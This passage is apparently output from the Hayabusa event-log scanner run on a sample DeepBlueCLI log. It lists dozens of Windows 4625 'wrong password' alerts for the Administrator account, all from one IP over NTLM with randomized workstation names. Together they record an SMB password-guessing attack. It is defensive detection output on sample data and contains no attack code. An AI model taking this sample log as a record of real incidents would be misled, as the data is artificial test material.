NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: 